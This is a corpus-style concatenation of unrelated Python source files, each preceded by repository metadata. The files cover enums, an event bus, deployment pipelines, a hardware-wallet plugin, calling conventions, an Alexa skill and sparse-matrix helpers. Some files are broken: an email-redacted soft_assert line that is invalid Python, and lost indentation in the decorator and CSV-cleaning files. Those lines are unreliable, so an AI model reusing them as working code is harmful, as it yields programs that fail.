class MicrosoftGraphWebsiteType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Website kinds (case-insensitive string enum; auto-generated)."""
    OTHER = "other"
    HOME = "home"
    WORK = "work"
    BLOG = "blog"
    PROFILE = "profile"
class MicrosoftGraphWeekIndex(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Ordinal week-of-month index (case-insensitive string enum)."""
    FIRST = "first"
    SECOND = "second"
    THIRD = "third"
    FOURTH = "fourth"
    LAST = "last"
class MicrosoftGraphWorkbookOperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Status of a workbook operation (case-insensitive string enum)."""
    NOT_STARTED = "notStarted"
    RUNNING = "running"
    SUCCEEDED = "succeeded"
    FAILED = "failed"
| 2.15625 | 2 |
evntbus/decorators.py | jmwri/eventbus | 0 | 17650 | import typing
if typing.TYPE_CHECKING:
from evntbus.bus import Bus
def listen_decorator(evntbus: 'Bus'):
    """Create a decorator class bound to *evntbus*.

    The returned class is instantiated with an event type (and an optional
    priority) and, when applied to a callable, registers that callable as a
    listener on the bus before handing the callable back unchanged.
    """
    class ListenDecorator(object):
        def __init__(self, event: typing.Type, priority: int = 5):
            self._event = event
            self._priority = priority

        def __call__(self, handler: typing.Callable) -> typing.Callable:
            # Register at decoration time, then return the callable untouched.
            evntbus.listen(self._event, handler, self._priority)
            return handler

    return ListenDecorator
| 2.890625 | 3 |
src/shortcircuit/model/crestprocessor.py | farshield/shortcircu | 35 | 17651 | <gh_stars>10-100
# crestprocessor.py
import threading
from PySide import QtCore
from crest.crest import Crest
class CrestProcessor(QtCore.QObject):
    """
    CREST Middle-ware

    Bridges the blocking CREST HTTP client onto Qt signals, running the slow
    network calls on daemon worker threads so the GUI thread never blocks.
    """
    login_response = QtCore.Signal(str)
    logout_response = QtCore.Signal()
    location_response = QtCore.Signal(str)
    destination_response = QtCore.Signal(bool)

    def __init__(self, implicit, client_id, client_secret, parent=None):
        super(CrestProcessor, self).__init__(parent)
        self.crest = Crest(implicit, client_id, client_secret, self._login_callback, self._logout_callback)

    def login(self):
        """Start the local OAuth callback server and return its result."""
        return self.crest.start_server()

    def logout(self):
        """Log the character out of CREST."""
        self.crest.logout()

    def get_location(self):
        """Fetch the character location in the background (emits location_response)."""
        self._run_async(self._get_location)

    def _get_location(self):
        location = self.crest.get_char_location()
        self.location_response.emit(location)

    def set_destination(self, sys_id):
        """Set the autopilot destination in the background (emits destination_response)."""
        self._run_async(self._set_destination, sys_id)

    def _set_destination(self, sys_id):
        response = self.crest.set_char_destination(sys_id)
        self.destination_response.emit(response)

    def _run_async(self, target, *args):
        """Run *target(*args)* on a daemon thread so app exit is never blocked."""
        worker = threading.Thread(target=target, args=args)
        # Thread.setDaemon() is deprecated; assign the attribute directly.
        worker.daemon = True
        worker.start()

    def _login_callback(self, char_name):
        self.login_response.emit(char_name)

    def _logout_callback(self):
        self.logout_response.emit()
| 2.375 | 2 |
src/commands/pipelines.py | vicobits/sawi-cli | 1 | 17652 | <reponame>vicobits/sawi-cli
# -*- coding: utf-8 -*-
import click
from src.commands.project import Project
from src.commands.server import Server
from src.commands.config import WebServer
from src.common.context import CommandContext
from src.common.decorators import settings, update_config_file
class Pipeline:
    """High-level deployment commands.

    Every method is a static command receiving a CommandContext (remote
    connection + project config) and delegating to the Server/Project
    helpers; the @settings decorator configures sudo usage / local-only
    execution for each command.
    """
    @staticmethod
    @settings(allow_sudo=True)
    def update(context: CommandContext):
        """Update and upgrade the server's APT packages."""
        context.connection.sudo('apt-get update')
        context.connection.sudo('apt-get upgrade -y')
    @staticmethod
    @settings(allow_sudo=True)
    def deps(context: CommandContext):
        """Install server system dependencies."""
        Server.deps(context)
    @staticmethod
    @settings(allow_sudo=True)
    def setup_server(context: CommandContext):
        """Provision a fresh server end-to-end: dependencies, user/group,
        directory layout, database, git remote, web server, gunicorn,
        supervisor and a Let's Encrypt certificate."""
        Server.deps(context)
        Server.user(context)
        Server.group(context)
        Server.layout(context)
        Server.create_db(context)
        Server.fix_permissions(context)
        Server.git(context)
        Server.add_remote(context)
        Server.web_server(context)
        Server.gunicorn(context)
        Server.supervisor(context)
        # fixed again because the steps above create new files
        Server.fix_permissions(context)
        Server.letsencrypt(context)
    @staticmethod
    @settings(allow_sudo=True)
    def clean_server(context: CommandContext):
        """
        Uninstall app in selected server(s)
        """
        Server.clean(context)
    @staticmethod
    @settings(allow_sudo=True)
    def restart_server(context: CommandContext):
        """
        Restart all app services.
        """
        Server.restart_services(context)
    @staticmethod
    @settings()
    def deploy(context: CommandContext):
        """Push the code, refresh the environment, install and clean up."""
        Project.push(context)
        Project.environment(context)
        Project.install(context)
        Project.clean(context)
    @staticmethod
    @settings(allow_sudo=True)
    def fix_permissions(context: CommandContext):
        """Normalize ownership/permissions of the deployed files."""
        Server.fix_permissions(context)
    @staticmethod
    @settings()
    def add_remote(context: CommandContext):
        """Register the server's git repository as a git remote."""
        Server.add_remote(context)
    @staticmethod
    @settings(allow_sudo=True)
    def createsuperuser(context: CommandContext):
        """
        Create a project superuser in selected server(s).
        """
        Project.create_superuser(context)
    @staticmethod
    @settings()
    def run_command(context: CommandContext, command):
        """Run an arbitrary project management command on the server."""
        Project.run_command(context, command)
    @staticmethod
    @settings()
    def migrate(context: CommandContext):
        """Apply pending database migrations."""
        Project.migrate(context)
    @staticmethod
    @settings()
    def load_fixtures(context: CommandContext):
        """Load the project's data fixtures."""
        Project.load_fixtures(context)
    @staticmethod
    @settings(only_local=True)
    def upload_sshkey(context: CommandContext):
        """
        Upload SSH key to server.
        """
        Project.upload_key(context)
    @staticmethod
    @settings(allow_sudo=True)
    def setup_ssl(context: CommandContext, artifact=None):
        """Configure SSL.

        With no artifact: install certbot and a Let's Encrypt certificate.
        artifact='renew' renews the certificate; an artifact equal to
        WebServer.NGINX.value reconfigures nginx; anything else is
        reported as unsupported.
        """
        if artifact:
            if not context.config.https:
                # flipping [https] in the user's config file requires consent
                is_agree = input(
                    'We will change the value of [https] in your config file, Are you agree? Y/n: '
                ) or 'n'
                if is_agree.upper() == "Y":
                    update_config_file(key="https", value=True)
            if artifact == 'renew':
                Server.renew_ssl(context)
            elif artifact == WebServer.NGINX.value:
                Server.nginx(context)
            else:
                click.echo(click.style('[{0}] doesn\'t implemented'.format(artifact), fg='red'))
        else:
            Server.certbot(context)
            Server.letsencrypt(context)
    @staticmethod
    @settings(allow_sudo=True)
    def server_language(context: CommandContext):
        """Force a UTF-8 locale in /etc/environment.

        NOTE(review): ``run('echo $LANG').ok`` is true even when LANG is
        unset (echo always succeeds), so these appends run unconditionally
        and may add duplicate lines -- confirm the intended guard.
        """
        if context.connection.run('echo $LANG').ok:
            context.connection.sudo('echo "LANG=C.UTF-8" >> /etc/environment')
        if context.connection.run('echo $LC_CTYPE').ok:
            context.connection.sudo('echo "LC_CTYPE=C.UTF-8" >> /etc/environment')
        if context.connection.run('echo $LC_ALL').ok:
            context.connection.sudo('echo "LC_ALL=C.UTF-8" >> /etc/environment')
    @staticmethod
    @settings(allow_sudo=True)
    def reset_db(context: CommandContext):
        """Drop and recreate the project database."""
        Server.reset_db(context)
# @classmethod
# def make_backup(cls):
# Global.set_user(superuser=True)
# with settings(hide('warnings'), warn_only=True):
# execute(Project.backup, hosts=env.hosts)
# execute(Project.download_backup, hosts=env.hosts)
#
| 1.875 | 2 |
build.py | jmetzz/coffee-chatbot | 0 | 17653 | <filename>build.py
from pybuilder.core import use_plugin, init
# Activate the PyBuilder plugins used by this build.
use_plugin("python.core")
use_plugin("python.unittest")
use_plugin("python.install_dependencies")
use_plugin("python.flake8")
use_plugin("python.coverage")
# Project identity and the default task chain executed by `pyb`.
name = "ActionServerPybuilder"
default_task = ['install_dependencies', 'analyze', 'publish']
@init
def set_properties(project):
    """Declare the build-time (test) dependencies of the project."""
    for dependency in ("tblib", "mockito", "parameterized", "responses"):
        project.build_depends_on(dependency)
@init
def initialize_flake8_plugin(project):
    """Configure flake8: verbose, build-breaking, 120-char line limit."""
    project.build_depends_on("flake8")
    flake8_settings = (
        ('unittest_module_glob', 'test_*'),
        ("flake8_verbose_output", True),
        ("flake8_break_build", True),
        ("flake8_max_line_length", 120),
        ("flake8_exclude_patterns", None),
        ("flake8_include_test_sources", False),
        ("flake8_include_scripts", False),
    )
    for key, value in flake8_settings:
        project.set_property(key, value)
@init
def initialize_coverage_plugin(project):
    """Configure coverage: warn below 80%, never fail the build on coverage."""
    for key, value in (('coverage_break_build', False),
                       ('coverage_threshold_warn', 80)):
        project.set_property(key, value)
    # for now, code coverage does not break the build
    # as we do Python, a scripted language, you have to aim for 100% coverage!
    project.set_property("coverage_exceptions", ['endpoint'])
| 2.265625 | 2 |
electrumsv/devices/hw_wallet/plugin.py | tuoshao/electrumsv | 1 | 17654 | #!/usr/bin/env python2
# -*- mode: python -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2016 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.util import versiontuple
from .cmdline import CmdLineHandler
class HW_PluginBase(object):
    """Base class for hardware-wallet plugins.

    Subclasses are expected to provide ``keystore_class`` and
    ``minimum_library`` (and optionally ``maximum_library``) as class
    attributes.
    """
    # class attribute: one lock shared by all plugin instances
    hid_lock = threading.Lock()
    def __init__(self, device_kind):
        self.device = self.keystore_class.device
        self.name = device_kind
        self.logger = logs.get_logger(device_kind)
    def create_keystore(self, d):
        """Instantiate this plugin's keystore from serialized data ``d``."""
        keystore = self.keystore_class(d)
        keystore.plugin = self
        # This should be replaced when a window is opened in the gui
        keystore.gui_handler = CmdLineHandler()
        return keystore
    def is_enabled(self):
        return True
    def get_library_version(self) -> str:
        """Returns the version of the 3rd party python library
        for the hw wallet. For example '0.9.0'
        Returns 'unknown' if library is found but cannot determine version.
        Raises 'ImportError' if library is not found.
        Raises 'LibraryFoundButUnusable' if found but there was a problem (includes version num).
        """
        raise NotImplementedError()
    def check_libraries_available(self) -> bool:
        """Return True iff the vendor library is importable and its version
        lies in [minimum_library, maximum_library); on failure, records a
        user-facing explanation in ``self.libraries_available_message``."""
        def version_str(t):
            return ".".join(str(i) for i in t)
        try:
            # this might raise ImportError or LibraryFoundButUnusable
            library_version = self.get_library_version()
            # if no exception so far, we might still raise LibraryFoundButUnusable
            # (precedence: A or B or (C and D) -- the upper-bound check only
            # applies when maximum_library is defined)
            if (library_version == 'unknown' or
                    versiontuple(library_version) < self.minimum_library or
                    hasattr(self, "maximum_library") and
                    versiontuple(library_version) >= self.maximum_library):
                raise LibraryFoundButUnusable(library_version=library_version)
        except ImportError:
            return False
        except LibraryFoundButUnusable as e:
            library_version = e.library_version
            max_version_str = (version_str(self.maximum_library)
                               if hasattr(self, "maximum_library") else "inf")
            self.libraries_available_message = (
                _("Library version for '{}' is incompatible.").format(self.name)
                + '\nInstalled: {}, Needed: {} <= x < {}'
                .format(library_version, version_str(self.minimum_library), max_version_str))
            self.logger.warning(self.libraries_available_message)
            return False
        return True
    def get_library_not_available_message(self) -> str:
        """Return the recorded incompatibility message, or a generic
        'missing libraries' message when none was recorded."""
        if hasattr(self, 'libraries_available_message'):
            message = self.libraries_available_message
        else:
            message = _("Missing libraries for {}.").format(self.name)
            message += '\n' + _("Make sure you install it with python3")
        return message
    def enumerate_devices(self):
        raise NotImplementedError
class LibraryFoundButUnusable(Exception):
    """Vendor library was importable but its version cannot be used."""
    def __init__(self, library_version='unknown'):
        super().__init__()
        # version string reported by the library, or 'unknown'
        self.library_version = library_version
| 1.726563 | 2 |
api_service/tests/test_model_ids.py | seattleflu/Seattle-Flu-Incidence-Mapper | 6 | 17655 | <reponame>seattleflu/Seattle-Flu-Incidence-Mapper
import unittest
from seattle_flu_incidence_mapper.utils import get_model_id
class TestGetIdFromQuery(unittest.TestCase):
    """Regression check: model ids derived from query objects stay stable."""
    def test_ids_match_expected(self):
        expected = {
            "f39442e6883958971ecc1d0213c59f91": {"model_type":"inla","observed":["encountered_week","flu_shot","PUMA5CE","sampling_location"],"pathogen":["vic"]},
            "29cc23488ba96c938113852c28b55c13": {"model_type":"inla latent","observed":["encountered_week","pathogen","PUMA5CE"],"pathogen":["vic"]}
        }
        for known_id, query_obj in expected.items():
            self.assertEqual(known_id, get_model_id(query_obj))
| 2.6875 | 3 |
Cleaning.py | TharindraParanagama/MovieClassification | 0 | 17656 | import csv
input = open('MovieI.csv', 'rb')
output = open('MovieO.csv', 'wb')
writer = csv.writer(output)
for row in csv.reader(input):
for i in range(len(row)):
if(row[0]==''):
break
elif(row[1]==''):
break
elif(row[2]==''):
break
elif(row[3]==''):
break
elif(row[4]==''):
break
else :writer.writerow(row)
input.close()
output.close() | 3.265625 | 3 |
venues/apps.py | danroberts728/hsvdotbeer | 18 | 17657 | <reponame>danroberts728/hsvdotbeer
from django.apps import AppConfig
class VenuesConfig(AppConfig):
    """Django application configuration for the ``venues`` app."""
    name = "venues"
| 1.414063 | 1 |
problems/remove-duplicates-from-sorted-list.py | sailikhithk/tech-interview-prep | 0 | 17658 | """
The key is to use a set to remember if we seen the node or not.
Next, think about how we are going to *remove* the duplicate node?
The answer is to simply link the previous node to the next node.
So we need to keep a pointer `prev` on the previous node as we iterate the linked list.
So, the solution.
Create a set `seen`. #[1]
Point pointer `prev` at the first node, `curr` at the second.
Now we iterate through the linked list.
* For every node, we add its value to `seen`. Move `prev` and `curr` forward. #[2]
* If we seen the node, we *remove* the `curr` node. Then move the curr forward. #[3]
Return the `head`
"""
class Solution(object):
    def deleteDuplicates(self, head):
        """Unlink every node whose value was already seen; return the head."""
        if head is None or head.next is None:
            return head
        seen = {head.val}
        prev, node = head, head.next
        while node:
            if node.val in seen:
                prev.next = node.next  # unlink the duplicate
            else:
                seen.add(node.val)
                prev = node
            node = node.next
        return head
| 4.1875 | 4 |
corehq/apps/analytics/signals.py | kkrampa/commcare-hq | 1 | 17659 | <reponame>kkrampa/commcare-hq
from __future__ import absolute_import
from __future__ import unicode_literals
import six
from django.conf import settings
from django.contrib.auth.signals import user_logged_in
from corehq.apps.analytics.tasks import (
track_user_sign_in_on_hubspot,
HUBSPOT_COOKIE,
update_hubspot_properties,
identify,
update_subscription_properties_by_domain, get_subscription_properties_by_user)
from corehq.apps.analytics.utils import get_meta
from corehq.apps.registration.views import ProcessRegistrationView
from corehq.util.decorators import handle_uncaught_exceptions
from corehq.util.python_compatibility import soft_assert_type_text
from corehq.util.soft_assert import soft_assert
from django.dispatch import receiver
from django.urls import reverse
from corehq.apps.users.models import CouchUser
from corehq.apps.accounting.signals import subscription_upgrade_or_downgrade
from corehq.apps.domain.signals import commcare_domain_post_save
from corehq.apps.users.signals import couch_user_post_save
from corehq.apps.analytics.utils import get_instance_string
# NOTE(review): the recipient addresses below were mangled by an automated
# redaction pass ('<EMAIL>' placeholders); as written this statement is not
# valid Python. Restore the real addresses from VCS history before shipping.
_no_cookie_soft_assert = soft_assert(to=['{}<EMAIL>('<EMAIL>', '<EMAIL>'),
                                         <EMAIL>('<EMAIL>', '<EMAIL>'),
                                         <EMAIL>('<EMAIL>', '<EMAIL>')],
                                     send_to_ops=False)
@receiver(couch_user_post_save)
def user_save_callback(sender, **kwargs):
    """After a web user is saved, push their subscription and domain-membership
    traits to the analytics backends."""
    couch_user = kwargs.get("couch_user")
    if not couch_user or not couch_user.is_web_user():
        return
    properties = dict(get_subscription_properties_by_user(couch_user))
    properties.update(get_domain_membership_properties(couch_user))
    identify.delay(couch_user.username, properties)
    update_hubspot_properties.delay(couch_user, properties)
@receiver(commcare_domain_post_save)
@receiver(subscription_upgrade_or_downgrade)
def domain_save_callback(sender, domain, **kwargs):
    """Refresh analytics subscription properties when a domain is saved or its
    subscription changes. ``domain`` may be a Domain object or a name string."""
    is_name = isinstance(domain, six.string_types)
    if is_name:
        soft_assert_type_text(domain)
    update_subscription_properties_by_domain(domain if is_name else domain.name)
def get_domain_membership_properties(couch_user):
    """Return analytics properties describing the user's domain memberships,
    keyed with the environment-specific prefix."""
    prefix = get_instance_string()
    domains = couch_user.domains
    return {
        prefix + "number_of_project_spaces": len(domains),
        prefix + "project_spaces_list": '\n'.join(domains),
    }
@receiver(user_logged_in)
@handle_uncaught_exceptions(mail_admins=True)
def track_user_login(sender, request, user, **kwargs):
    """On login, forward a Hubspot sign-in event for web users (only when a
    Hubspot API id is configured)."""
    if settings.ANALYTICS_IDS.get('HUBSPOT_API_ID'):
        couch_user = CouchUser.from_django_user(user)
        if couch_user and couch_user.is_web_user():
            if not request or HUBSPOT_COOKIE not in request.COOKIES:
                # API calls, form submissions etc.
                # NOTE(review): when ``request`` is None this line dereferences
                # request.path and would raise AttributeError -- confirm request
                # is always non-None on this signal.
                user_confirming = request.path.startswith(reverse(ProcessRegistrationView.urlname))
                if user_confirming:
                    _no_cookie_soft_assert(False, 'User confirmed account but had no cookie')
                else:
                    return
            meta = get_meta(request)
            track_user_sign_in_on_hubspot.delay(couch_user, request.COOKIES.get(HUBSPOT_COOKIE),
                                                meta, request.path)
| 1.617188 | 2 |
manage.py | BeyondLam/Flask_Blog_Python3 | 2 | 17660 | from app import create_app, db
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
# Build the app via the factory and attach Flask-Script with Flask-Migrate's
# `db` command group.
app = create_app("develop")
manager = Manager(app)
Migrate(app, db)
manager.add_command("db", MigrateCommand)
# Seed the administrator account data; registered below as a manager command
@manager.command
def create_admin():
    """Seed the administrator account from the config_message.constant values.

    Run as: ``python manage.py create_admin``.
    """
    from app.models import Admin
    from config_message.constant import ADMIN_USERNAME, ADMIN_PASSWORD, ADMIN_AVATAR_URL, ADMIN_POWER
    try:
        # restore the redaction-broken `password=<PASSWORD>` to the imported constant
        admin_new = Admin(username=ADMIN_USERNAME, password=ADMIN_PASSWORD, avatar=ADMIN_AVATAR_URL,
                          power=ADMIN_POWER)
        db.session.add(admin_new)
        db.session.commit()
        print("初始化成功")
    except Exception:
        # narrowed from a bare ``except`` so SystemExit/KeyboardInterrupt propagate
        print("初始化失败")
        db.session.rollback()
if __name__ == '__main__':
    # Dispatch CLI commands (runserver, db, create_admin, ...)
    manager.run()
qiling/qiling/cc/intel.py | mrTavas/owasp-fstm-auto | 2 | 17661 | <gh_stars>1-10
#!/usr/bin/env python3
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
from unicorn.x86_const import (
UC_X86_REG_AX, UC_X86_REG_EAX, UC_X86_REG_RAX, UC_X86_REG_RCX,
UC_X86_REG_RDI, UC_X86_REG_RDX, UC_X86_REG_RSI, UC_X86_REG_R8,
UC_X86_REG_R9, UC_X86_REG_R10
)
from qiling import Qiling
from . import QlCommonBaseCC
class QlIntelBaseCC(QlCommonBaseCC):
    """Calling convention base class for Intel-based systems.
    Supports arguments passing over registers and stack.
    """
    def __init__(self, ql: Qiling):
        # The accumulator holds the return value; pick the width-appropriate
        # alias (ax / eax / rax) from the emulated architecture's bitness.
        retreg = {
            16: UC_X86_REG_AX,
            32: UC_X86_REG_EAX,
            64: UC_X86_REG_RAX
        }[ql.archbit]
        super().__init__(ql, retreg)
    def unwind(self, nslots: int) -> int:
        # no cleanup; just pop out the return address
        return self.ql.arch.stack_pop()
class QlIntel64(QlIntelBaseCC):
    """Calling convention base class for Intel-based 64-bit systems.
    """
    @staticmethod
    def getNumSlots(argbits: int) -> int:
        # Slots are 64 bits wide; sub-64-bit arguments still occupy one slot.
        return max(argbits, 64) // 64
class QlIntel32(QlIntelBaseCC):
    """Calling convention base class for Intel-based 32-bit systems.
    """
    @staticmethod
    def getNumSlots(argbits: int) -> int:
        # Slots are 32 bits wide, so a 64-bit argument consumes two slots.
        return max(argbits, 32) // 32
    def getRawParam(self, slot: int, nbits: int = None) -> int:
        """Read a parameter, combining two consecutive 32-bit slots into one
        64-bit value when nbits == 64 (low slot first, then high slot)."""
        __super_getparam = super().getRawParam
        if nbits == 64:
            lo = __super_getparam(slot)
            hi = __super_getparam(slot + 1)
            val = (hi << 32) | lo
        else:
            val = __super_getparam(slot, nbits)
        return val
class amd64(QlIntel64):
    """Default calling convention for POSIX (x86-64).
    First 6 arguments are passed in regs, the rest are passed on the stack.
    """
    # NOTE(review): R10 appears where the SysV user-space ABI uses RCX; this
    # matches the x86-64 *syscall* register order -- presumably intentional
    # for syscall emulation, confirm.
    _argregs = (UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, UC_X86_REG_R10, UC_X86_REG_R8, UC_X86_REG_R9) + (None, ) * 10
class ms64(QlIntel64):
    """Default calling convention for Windows and UEFI (x86-64).
    First 4 arguments are passed in regs, the rest are passed on the stack.
    Each stack frame starts with a shadow space in size of 4 items, corresponding
    to the first arguments passed in regs.
    """
    _argregs = (UC_X86_REG_RCX, UC_X86_REG_RDX, UC_X86_REG_R8, UC_X86_REG_R9) + (None, ) * 12
    # number of stack slots reserved as shadow space for the register arguments
    _shadow = 4
class macosx64(QlIntel64):
    """Default calling convention for Mac OS (x86-64).
    First 6 arguments are passed in regs, the rest are passed on the stack.
    """
    _argregs = (UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, UC_X86_REG_RCX, UC_X86_REG_R8, UC_X86_REG_R9) + (None, ) * 10
class cdecl(QlIntel32):
    """Calling convention used by all operating systems (x86).
    All arguments are passed on the stack.
    The caller is responsible to unwind the stack.
    """
    _argregs = (None, ) * 16
class stdcall(QlIntel32):
    """Calling convention used by all operating systems (x86).
    All arguments are passed on the stack.
    The callee is responsible to unwind the stack.
    """
    _argregs = (None, ) * 16
    def unwind(self, nslots: int) -> int:
        # pop the return address, then drop the argument slots the callee owns
        retaddr = super().unwind(nslots)
        self.ql.reg.arch_sp += (nslots * self._asize)
        return retaddr
| 2.390625 | 2 |
Alexa_Dynamo.py | gnomesoup/pyDynamo | 0 | 17662 | ### ----------- Python Code ------------###
import csv
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import pandas as pd
### ------------- Start Alexa Stuff ---------###
# Flask app with the flask-ask Alexa skill mounted at the web root.
app = Flask(__name__)
ask = Ask(app, "/")
#logging.getLogger("flask_ask").setLevel(logging.DEBUG)
### ----------- Switch Function --------------###
def setSwitch(Switchboard, switch, new_state):
    """Persist *new_state* for *switch* in the <Switchboard>.csv switch file.

    Args:
        Switchboard: path prefix of the CSV switchboard file (no extension).
        switch: value in the 'switch' column identifying the row to update.
        new_state: value written into that row's 'state' column.

    The whole file is rewritten in place; concurrent writers are not handled.
    """
    switch_df = pd.read_csv(Switchboard + ".csv")
    switch_df = switch_df.set_index('switch')
    # DataFrame.set_value was deprecated in pandas 0.21 and removed in 1.0;
    # .at is the supported scalar setter.
    switch_df.at[switch, 'state'] = new_state
    switch_df.to_csv(Switchboard + ".csv")
### ----------- Switch Function --------------###
def ReadInfo(Switchboard):
    """Return the 'Count' value from the first row of <Switchboard>.csv."""
    frame = pd.read_csv(Switchboard + ".csv")
    return frame['Count'].iloc[0]
### ----------- Launch Skill --------------###
@ask.launch
def start_skill():
    """Greet the user when the skill is launched and wait for a question."""
    return question('Hello, what would you like to ask the architect')
### -------------- Say Hello --------------- ####
@ask.intent("hello")
def hello():
    """Flip switch00 on in the Dynamo switchboard and say hello."""
    setSwitch('C:\\sfdug\\Alexa', 'switch00', '1')
    return statement("Hello San Francisco Dynamo user group")
### -------------- Create Points --------------- ####
@ask.intent("CreatePoints")
def CreatePoints():
    """Flip switch01 on, triggering the graph that creates the sculpture points."""
    setSwitch('C:\\sfdug\\Alexa', 'switch01', '1')
    return statement("I am creating the points for the Janet Echelman sculptor")
### -------------- Create Connection --------------- ####
@ask.intent("CreateConnection")
def CreateConnection():
    """Flip switch02 on, triggering the graph that connects the points."""
    setSwitch('C:\\sfdug\\Alexa', 'switch02', '1')
    return statement("I am creating a connection between the points")
### -------------- Create Framing --------------- ####
@ask.intent("CreateFraming")
def CreateFraming():
    """Flip switch03 on, triggering the graph that builds the framing."""
    setSwitch('C:\\sfdug\\Alexa', 'switch03', '1')
    return statement("I am creating the framing for the Janet Echelman sculptor")
### -------------- Reset --------------- ####
@ask.intent("Reset")
def Reset():
    """Turn all Dynamo trigger switches back off."""
    for sw in ('switch01', 'switch02', 'switch03'):
        setSwitch('C:\\sfdug\\Alexa', sw, '0')
    return statement("I have reset Revvit")
### -------------- Count Framing --------------- ####
@ask.intent("CountFraming")
def CountFraming():
    """Speak the count read back from the AlexaRead info file."""
    return statement("I have counted: {}".format(ReadInfo('C:\\sfdug\\AlexaRead')))
### --------------- Port for Ngrok -------------##
if __name__ == '__main__':
    port = 9000 # custom port exposed through ngrok
    app.run(host='0.0.0.0', port=port)
    # NOTE(review): this second run() only executes after the first server
    # stops and then restarts the app in debug mode -- likely leftover; confirm.
    app.run(debug=True)
HW/hklearn/model.py | leguiart/Machine-Learning | 0 | 17663 | import abc
'''
Interface that every model implements.
Every model inside the hklearn library implements
the following behaviors:
    -fit : trains the model on a matrix of examples X and their corresponding labels y
    -predict : the trained model predicts outputs for an input matrix X
    of examples
'''
class ModelInterface(metaclass=abc.ABCMeta):
    """Structural interface: any class exposing callable ``fit`` and
    ``predict`` attributes is treated as a subclass."""
    @classmethod
    def __subclasshook__(cls, subclass):
        return all(
            callable(getattr(subclass, attr, None))
            for attr in ('fit', 'predict')
        )
@ModelInterface.register
class Model:
    """Model skeleton registered as a virtual subclass of ModelInterface.

    Fix: the original placed a bare string statement between the methods
    instead of attaching it as ``predict``'s docstring; both descriptions
    are now proper (English) method docstrings.
    """

    def fit(self, X, y):
        """Train the model on the example matrix X and its labels y."""
        pass

    def predict(self, X):
        """Predict outputs for the example matrix X with the trained model."""
        pass
pecos/utils/smat_util.py | UniqueUpToPermutation/pecos | 2 | 17664 | # Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
import collections
import numpy as np
import scipy.sparse as smat
def cs_matrix(arg1, mat_type, shape=None, dtype=None, copy=False, check_contents=False):
    """Custom compressed sparse matrix constructor that allows indices and indptr
    to be stored in different integer types.

    Args:
        arg1 (tuple): (data, indices, indptr) to construct compressed sparse matrix
        mat_type (type): the matrix type to construct, one of
            [scipy.sparse.csr_matrix | scipy.sparse.csc_matrix]
        shape (tuple, optional): shape of the matrix, default None to infer from arg1
        dtype (type, optional): type of values in the matrix, default None to infer from data
        copy (bool, optional): whether to copy the input arrays, defaults to False
        check_contents (bool, optional): whether to check array contents to determine
            dtype, defaults to False

    Returns:
        compressed sparse matrix in mat_type

    Raises:
        ValueError: if shape is None and the dimensions cannot be inferred from arg1
    """
    (data, indices, indptr) = arg1
    # scipy >= 1.8 moved sputils to the private _sputils module; support both.
    try:
        get_index_dtype = smat.sputils.get_index_dtype
    except AttributeError:
        from scipy.sparse import _sputils
        get_index_dtype = _sputils.get_index_dtype
    indices_dtype = get_index_dtype(indices, check_contents=check_contents)
    indptr_dtype = get_index_dtype(indptr, check_contents=check_contents)

    if shape is None:
        # Fix: infer dimensions from the *input* arrays. The previous code read
        # ret.indptr / ret.indices from the freshly created (empty) matrix, so
        # inference could never see the caller's data.
        try:
            major_dim = len(indptr) - 1
            minor_dim = int(np.max(indices)) + 1
        except Exception:
            raise ValueError("unable to infer matrix dimensions")
        if major_dim < 1:
            raise ValueError("unable to infer matrix dimensions")
        # the major axis is rows for CSR and columns for CSC
        shape = (minor_dim, major_dim) if mat_type is smat.csc_matrix else (major_dim, minor_dim)

    def _as_typed(arr, arr_dtype):
        # np.array(..., copy=False) raises on numpy >= 2 when a dtype cast forces
        # a copy; asarray preserves the old copy-only-if-needed behavior.
        if copy:
            return np.array(arr, copy=True, dtype=arr_dtype)
        return np.asarray(arr, dtype=arr_dtype)

    ret = mat_type(shape, dtype=dtype)
    ret.indices = _as_typed(indices, indices_dtype)
    ret.indptr = _as_typed(indptr, indptr_dtype)
    ret.data = _as_typed(data, dtype)
    return ret
def csr_matrix(arg1, shape=None, dtype=None, copy=False):
    """Build a scipy.sparse.csr_matrix from (data, indices, indptr), letting
    indices and indptr keep independent integer dtypes.

    Args:
        arg1 (tuple): (data, indices, indptr) triplet
        shape (tuple, optional): matrix shape; inferred from arg1 when None
        dtype (type, optional): value dtype; inferred from data when None
        copy (bool, optional): copy the input arrays instead of wrapping them

    Returns:
        csr_matrix
    """
    return cs_matrix(arg1, mat_type=smat.csr_matrix, shape=shape, dtype=dtype, copy=copy)
